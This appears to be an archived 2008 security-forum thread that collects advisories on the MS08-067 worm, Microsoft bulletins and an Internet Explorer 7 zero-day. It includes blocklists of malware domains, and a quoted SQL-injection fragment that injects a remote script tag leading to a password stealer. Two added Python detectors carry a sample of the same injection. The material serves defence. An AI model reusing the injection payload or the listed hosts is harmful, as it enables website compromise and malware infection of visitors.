Old MS Alerts

MS08-067 worm in the wild

FYI...

Worm Exploiting MS08-067 in the Wild
- http://www.f-secure.com/weblog/archives/00001526.html
November 3, 2008 - "Code building on the proof of concept binaries that were mentioned last week has moved into the wild. We've received the first reports of a worm capable of exploiting the MS08-067 vulnerability. The exploit payload downloads a dropper that we detect as Trojan-Dropper.Win32.Agent.yhi. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g and the kernel component as Rootkit.Win32.KernelBot.dg."

Also see: http://isc.sans.org/diary.html?storyid=5275
Last Updated: 2008-11-03 18:54:56 UTC ...(Version: 3)

MSRT 2008-H1 - 43 percent increase in malware

FYI...

- http://www.theregister.co.uk/2008/11/03/microsoft_intelligence_report/
3 November 2008 - "Malware and unwanted software made strides in the first half of 2008, according to the latest security intelligence report from Microsoft, which tallied a 43 percent increase in the number of programs exorcised by the company's malicious software removal tool. In the first six months of this year, there were some 62 million disinfections on 23.8 million machines, according to the report which was published* Monday. In the second half of last year, 42 million programs were removed on 15 million computers. Because it runs on hundreds of millions of machines worldwide, Microsoft's MSRT, or malicious software removal tool, functions as something of a bellwether for the state of successful attacks affecting Windows computers. The increase was driven in part by the addition of new strains of malware that the MSRT checks for, said Jeff Williams, principal architect for the Microsoft Malware Protection Center. Win32/Taterf, a family of worms that steals login credentials for a host of online games, was one such addition and was removed 2.7 million times. Other causes included the growing aggressiveness of established malware families. Win32/Zlob, a trojan that has bedeviled Windows users for years, was removed 7.5 million times..."
* http://www.microsoft.com/sir

 
MS08-067 worm in the wild...

More detail...

- http://asert.arbornetworks.com/2008/11/ms08-067-used-to-drop-ddos-bots/
November 3, 2008 - "...The exploit code is 67.exe, and the bot itself is 6767.exe. KernelBot is a Chinese origin DDoS bot... We first became aware of this bot during the CNN.Com attacks earlier this year... If you want to stop this one, you should block all web access to the domain ushealthmart .com. It’s using a few hosts under that domain name to spread and send out configurations... KernelBot can send ICMP, TCP SYN, UDP, and even HTTP flood attacks, among others. It communicates with a server to retrieve the file, usually named “cmd.txt”, which itself is a large INI file describing attacks and next actions..."

- http://isc.sans.org/diary.html?storyid=5288
Last Updated: 2008-11-05 02:53:31 UTC - "...exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445 looking for vulnerable systems so blocking it at your enterprise gateway is recommended."

MS Bulletin Advance Notification - November 2008

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 6, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on November 11, 2008... (Total of -2-)

Critical (1)

Windows Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Microsoft Office...

Important (1)

Windows Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows..."
 
Hacker tool targeting MS08-067 vuln

FYI...

- http://securitylabs.websense.com/content/Blogs/3237.aspx
11.11.2008 - "Websense... has noticed a special hacker tool in China. In the past few weeks, Microsoft has announced and released a patch for the MS08-067 vulnerability, and a hacker tool named "wolfteeth bot catcher" has been widely used by hackers to attack machines running Windows operating systems -without- the KB958644 patch... First, the tool drops and runs a backdoor named bycnboy.exe, which moves itself to the system folder and is renamed to windef.exe. This means that hackers who used this tool were themselves hacked by the tool's author. Then a file named project.exe is placed in the temp folder and loaded to run once the original file has finished its job... a Trojan file from the user-defined Web site could be downloaded and executed. All the vulnerable IPs are controlled remotely..."

(Screenshots and more detail available at the URL above.)

 
MS Security Bulletin Summary - November 2008

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 11, 2008 - "This bulletin summary lists security bulletins released for November 2008... (Total of -2-)

Critical (1)

Microsoft Security Bulletin MS08-069
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (1)

Microsoft Security Bulletin MS08-068
Vulnerability in SMB Could Allow Remote Code Execution (957097)
- http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5330
Last Updated: 2008-11-11 18:28:39 UTC
 
MS08-067 exploits in the wild increase

FYI...

- http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx
November 25, 2008 5:37 PM - "As expected, we are seeing another wave of attacks exploiting the vulnerability detailed in security bulletin MS08-067. Early last week... the number of exploits in the wild was still low and they were mostly targeted attacks. However, during the weekend we started receiving customer reports for new malware that exploits this vulnerability. During the last two days that malware gained momentum and as a result we see an increased support call volume... This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll. It is also interesting to note that the worm patches the vulnerable API in memory so the machine will not be vulnerable anymore... We have also found several bots that exploit MS08-067... We continue to urge all our customers to install MS08-067*..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
CVSS v2 Base Score: 10.0 (HIGH)...
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service...
- http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm:Win32/Conficker.A
"...Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately..."
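The propagation behaviour described in the MMPC post above (an exploited machine fetching the worm over HTTP from a port between 1024 and 10000, often as a .JPG) can be hunted for in flow or proxy records. This is an added example, not code from Microsoft or from the original post; the record format, the 60-second correlation window, the restriction to private addresses and every sample address are assumptions constructed for illustration.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed sample records (not real traffic):
# time, source, destination, destination port, HTTP path ("-" if not HTTP).
SAMPLE_FLOWS = """\
2008-11-25T10:00:01 10.1.1.20 10.1.1.31 445 -
2008-11-25T10:00:04 10.1.1.31 10.1.1.20 4712 /kqzvd.jpg
2008-11-25T10:00:09 10.1.1.20 10.1.1.32 445 -
2008-11-25T10:02:00 10.1.1.40 10.1.1.5 445 -
2008-11-25T10:02:30 10.1.1.41 10.1.1.5 8080 /intranet/logo.jpg
2008-11-25T10:03:00 10.1.1.32 10.1.1.20 80 /update.jpg
"""

WINDOW = timedelta(seconds=60)   # assumed correlation window
PORT_RANGE = range(1024, 10001)  # "a random port between port 1024 and 10000"


def parse_flows(text):
    """Parse the whitespace-separated sample format into time-ordered dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, path = line.split()
        flows.append({
            "ts": datetime.fromisoformat(ts),
            "src": ipaddress.ip_address(src),
            "dst": ipaddress.ip_address(dst),
            "dport": int(dport),
            "path": None if path == "-" else path,
        })
    return sorted(flows, key=lambda f: f["ts"])


def find_callbacks(flows, window=WINDOW):
    """Return (scanner, victim, port, path) for every tcp/445 connection that
    is followed, within the window, by the target fetching a .jpg back from
    the connecting host on a port in the worm's range."""
    hits = []
    smb_seen = {}  # (scanner, target) -> time of the latest tcp/445 connection
    for f in flows:
        if f["dport"] == 445:
            smb_seen[(f["src"], f["dst"])] = f["ts"]
            continue
        if f["path"] is None or not f["path"].lower().endswith(".jpg"):
            continue
        if f["dport"] not in PORT_RANGE:
            continue
        # Assumption: only internal-to-internal transfers are of interest here.
        if not (f["src"].is_private and f["dst"].is_private):
            continue
        # The HTTP client is the exploited machine; the HTTP server is the
        # host that connected to it on tcp/445 moments earlier.
        smb_time = smb_seen.get((f["dst"], f["src"]))
        if smb_time is not None and f["ts"] - smb_time <= window:
            hits.append((str(f["dst"]), str(f["src"]), f["dport"], f["path"]))
    return hits


if __name__ == "__main__":
    for scanner, victim, port, path in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{victim} fetched {path} from {scanner}:{port} after SMB contact")
```

A workstation serving .jpg files to a peer it has just contacted on tcp/445 is worth isolating and checking for the missing MS08-067 update; the ordinary intranet image request in the sample is not flagged because no SMB connection preceded it in the reverse direction.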

MS08-067 vuln - 500,000 victims

FYI...

- http://blog.trendmicro.com/downad-gearing-up-for-a-botnet/
Nov. 30, 2008 - "A few days ago, Trend Micro got wind of a .DLL worm detected as WORM_DOWNAD.A that exploits the MS08-067 vulnerability. Its routines have led our security analysts to postulate that it is a key component in the development of a new botnet. Initially thought to be working in conjunction with a NETWORM variant, WORM_DOWNAD.A is now believed to be an updated version of an attack from the same criminal botnet gang. Fresh reports, however, suggest that this threat seems to have gone wider and has even extended its reach around the globe. More than 500,000 unique hosts have since been discovered to have fallen victim to this threat. These infected hosts are spread across different countries and as a random check by Trend Micro... revealed, they can be found in service provider networks in the U.S., China, India, the Middle East, Europe, and Latin America — several residential broadband providers appear to have a larger number of infected customers..."

 
MS Security Bulletin Advance Notification - December 2008

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 4, 2008
"This is an advance notification of security bulletins that Microsoft is intending to release on December 9, 2008... (Total of - 8 -)

Bulletin ID - Maximum Severity Rating and Vulnerability Impact - Restart Requirement - Affected Software

(Critical - 6)
Windows 1 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
Windows 2 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
IE - Critical - Remote Code Execution - Requires restart - Microsoft Windows, Internet Explorer
VB - Critical - Remote Code Execution - Requires restart - Microsoft Developer Tools and Software, Microsoft Office
Word - Critical - Remote Code Execution - Does not require restart - Microsoft Office
Excel - Critical - Remote Code Execution - Does not require restart - Microsoft Office
____

(Important - 2)
SharePoint - Important - Elevation of Privilege - Does not require restart - Microsoft Office, Microsoft Server Software
WMC - Important - Remote Code Execution - May require restart - Microsoft Windows
...

- http://www.us-cert.gov/current/#microsoft_releases_advanced_notification_for2
December 5, 2008 at 09:53 am - "... the December release cycle will contain eight bulletins, six of which will have a severity rating of Critical. The notification states that these Critical bulletins are for Microsoft Windows, Internet Explorer, and Office. There will also be two Important bulletins for Microsoft Windows and Office.."
 
FYI...

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 - "Microsoft is investigating new reports of a vulnerability in the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are -not- affected as these operating systems do not contain the vulnerable code. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability..."

- http://isc.sans.org/diary.html?storyid=5461
Last Updated: 2008-12-10 11:38:37 UTC

- http://blog.trendmicro.com/a-wordpad-of-caution/
Dec. 15, 2008 - "...The exploit works by using a specially-crafted .DOC, .WRI, or .RTF file to take advantage of the WordPad vulnerability, thereby causing the said application to crash. This crash may then allow a remote malicious user to take control of an affected system..."

- http://www.microsoft.com/technet/security/advisory/960906.mspx
• December 15, 2008: Updated the workaround, Disable the WordPad Text Converter for Word 97.

MS Security Bulletin Summary - December 2008

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
Published: December 9, 2008 - "This bulletin summary lists security bulletins released for December 2008... security bulletins for this month in order of severity... ( Total of - 8 - )

Critical (6)

Microsoft Security Bulletin MS08-071
Vulnerabilities in GDI Could Allow Remote Code Execution (956802)
- http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-075
Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-075.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-073
Cumulative Security Update for Internet Explorer (958215)
- http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-070
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Severity Rating: Critical
Affected Software: Microsoft Developer Tools and Software, Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-072
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)
- http://www.microsoft.com/technet/security/bulletin/ms08-072.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-074
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070)
- http://www.microsoft.com/technet/security/bulletin/ms08-074.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Important (2)

Microsoft Security Bulletin MS08-077
Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
- http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx
Severity Rating: Important
Affected Software: Microsoft Office, Microsoft Server Software...
Vulnerability Impact: Elevation of Privilege...

Microsoft Security Bulletin MS08-076
Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
Severity Rating: Important
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...
_____

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5449
Last Updated: 2008-12-09 20:36:04 UTC
_____

- http://preview.tinyurl.com/5oqpcj
December 9, 2008 (Computerworld) - "(MS)... patched 28 vulnerabilities... the biggest batch of fixes it has issued since it switched to a regular monthly update schedule more than five years ago. Of the 28 bugs quashed today, Microsoft ranked 23 of them critical..."

IEv7 0-day exploit in the wild...

FYI...

IE XML processing memory corruption
- http://secunia.com/advisories/33089/
Release Date: 2008-12-10
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x...
...Successful exploitation allows execution of arbitrary code.
NOTE: Reportedly, the vulnerability is currently being actively exploited.
The vulnerability is confirmed in Internet Explorer 7 on a fully patched Windows XP SP3. Other versions may also be affected.
Solution: Do not browse untrusted websites or follow untrusted links.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-10 09:38:03 UTC

- https://forums.symantec.com/syment/blog/article?blog.id=vulnerabilities_exploits&message.id=180#M180
12-10-2008 - "...We also recommend blocking the following hosts at network boundaries:
• wwwwyyyyy.cn
• sllwrnm5.cn
• baikec.cn
• oiuytr.net *
• laoyang4.cn
• cc4y7.cn ..."

* example: https://safeweb.norton.com/report/show?name=oiuytr.net

IEv7 0-day vuln...

FYI...

- http://securitylabs.websense.com/content/Alerts/3259.aspx
12.10.2008 - "...No user interaction is necessary for the exploit to be successful. A computer may become infected by simply visiting a malicious Web site. This vulnerability exists in the way XML is processed within Internet Explorer 7..."

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...Update: Microsoft published a bulletin regarding this issue*... In addition, shadowserver.org published a list of infected sites**. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7...

* http://www.microsoft.com/technet/security/advisory/961051.mspx
December 10, 2008 - "...Suggested Actions... Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors...
• Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones...
• Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone...
• Enable DEP for Internet Explorer 7...

IE7 0-Day Exploit Sites
** http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
10 December 2008 - "...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."

> http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...UPDATE 2: ...we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565 , for example). The important part includes the target URL that is injected:
… rtrim(convert(varchar(4000),['+@C+']))+''<script src=http ://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM …
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm ... If executed successfully, the script will download the binary from http ://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection ( http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a ) – there are some big names still missing it. In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed."

_____

- http://securitylabs.websense.com/content/Alerts/3260.aspx
12.11.2008 - "Websense... has discovered that the Taiwanese search engine "look.tw" has been compromised and is infecting site visitors with malicious code. The Web site has been injected with a recently announced Internet Explorer 7 Zero Day Attack ( http://securitylabs.websense.com/content/Alerts/3259.aspx ). The exploit on the site attempts to download a malicious executable called "ieupdate.exe". The download location is currently down, but could come back at any moment."
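Site operators can check their own web logs for the injection fragment quoted in the ISC diary update above (a script tag appended inside a `convert(varchar(4000), ...)` / `FETCH NEXT FROM` statement) and pull out the host the injected script points to. This is an added example, not code from ISC or from the original post; the log layout, the client addresses and the `.example` hosts are constructed, and the payload in the sample is the diary's fragment with its elisions kept.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed IIS-style request lines (not real logs):
# date time method path query status client-ip
SAMPLE_LOG = r"""
2008-12-11 09:12:01 GET /news.asp id=12 200 192.0.2.10
2008-12-11 09:12:07 GET /news.asp id=12;...rtrim(convert(varchar(4000),%5B'%2B@C%2B'%5D))%2B''%3Cscript%20src=http://injected.example/1.js%3E%3C/script%3E''')FETCH%20NEXT%20FROM... 200 198.51.100.7
2008-12-11 09:13:44 GET /search.asp q=%3Cscript%20src=http://static.example/lib.js%3E 200 192.0.2.11
2008-12-11 09:14:02 GET /item.asp id=5%20convert(varchar(10),getdate()) 200 192.0.2.12
"""

# A script tag whose src is an absolute http(s) URL.
SCRIPT_SRC = re.compile(
    r"<script[^>]*?\bsrc\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.IGNORECASE
)
# SQL constructs that appear in the fragment quoted in the diary.
SQL_MARKER = re.compile(
    r"convert\s*\(\s*varchar|fetch\s+next\s+from", re.IGNORECASE
)


def find_injected_scripts(log_text):
    """Return (client_ip, path, script_host) for each request whose decoded
    query string carries both a remote script tag and the SQL constructs."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # blank or malformed line
        _date, _time, _method, path, query, _status, client = fields
        decoded = unquote(query)  # attackers send the payload URL-encoded
        script = SCRIPT_SRC.search(decoded)
        if script is None or SQL_MARKER.search(decoded) is None:
            continue
        host = urlsplit(script.group(1)).hostname
        findings.append((client, path, host))
    return findings


if __name__ == "__main__":
    for client, path, host in find_injected_scripts(SAMPLE_LOG):
        print(f"{client} attempted injection via {path}; script host: {host}")
```

Requiring both signals keeps the rule narrow: the sample request with only a script tag and the one with only a `convert(varchar...)` call are left for other rules. Any host it reports is a candidate for the same gateway blocking the quoted advisories recommend, and the affected page's database columns should be checked for the appended tag.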

FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
Revisions:
• December 10, 2008: Advisory published
• December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds...
- Workarounds...
• Use ACL to disable OLEDB32.DLL...
• Unregister OLEDB32.DLL...
• Disable Data Binding support in Internet Explorer 8...

• December 15, 2008: Updated the workarounds, Disable XML Island functionality and Disable Row Position functionality of OLEDB32.dll.
...Registry Editor...

- http://support.microsoft.com/kb/961051
Last Review: December 14, 2008 - Revision: 3.0

IE 0day - status updates...

FYI...

MSIE 0-day Spreading Via SQL Injection
- http://isc.sans.org/diary.html?storyid=5464
Last Updated: 2008-12-12 01:00:18 UTC

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 12/11/08 12:05:32 -0400

IE7 0day expanded to include IE6 and IE8(beta)
- http://isc.sans.org/diary.html?storyid=5470
Last Updated: 2008-12-12 01:26:35 UTC

- http://securitylabs.websense.com/content/alerts.aspx
Date Description
12.12.2008 - ABIT China Web site Attacked by IE7 Zero Day
12.11.2008 - Taiwanese Search Engine, Look, Infected with IE 7 Zero Day

IE7 0-Day Exploit Gets Worse

Blocks...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...It turns out the domain that ISC is reported on is also dropping some pretty nasty malware. The domain "17gamo .com" is serving up the exploits which attempt to download malware from "www .steoo .com". Please do not visit either of these sites. If successful the exploits will install a Gh0st RAT on the system. This trojan is currently using the DNS name "evetlog .3322 .org" and is beaconing to tcp port 3020.
We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 (was recently 123.165.49.135)
The IP addresses are of course subject to change, so we recommend resolving them when appropriate for traffic monitoring/blocking...."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/12/2008 - 14:17 UTC/GMT

 
IE7 0-Day Exploit Sites - updated...

FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
"...Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well...
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."
Page last modified on December 14, 2008, at 01:13 AM <<<

 
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/14/2008 - 18:26 UTC/GMT:
( additions - Shadowserver recommended blocklist updates )
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

Highly recommended that you NOT visit these sites. "The majority if not all of them also house several other exploits for different vulnerabilities as well"...

Shadowserver IEv7 0-day exploit sites...

FYI... Shadowserver IEv7 0-day exploit sites / recommended blocklist sites...
Please do not visit -any- of these sites. The majority if not all of them also house several other exploits for different vulnerabilities as well...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219 *seen from SQL injection attacks*
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 ..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/16/2008 - 13:09 UTC/GMT

vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75

Updated 12/14/2008 - 18:26 UTC/GMT:
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

(Keep checking the Shadowserver URLs frequently for new updates)

IE patch tomorrow...

FYI...

- http://isc.sans.org/diary.html?storyid=5497
Last Updated: 2008-12-16 20:23:07 UTC - "Microsoft has announced that they will be releasing an out of cycle security bulletin tomorrow for the IE zero day*..."
* http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 16, 2008 - "...This bulletin advance notification will be replaced with the revised December bulletin summary on December 17, 2008. The revised bulletin summary will include the out-of-band security bulletin...
Bulletin Identifier: IE ...
Aggregate Severity Rating: Critical ..."
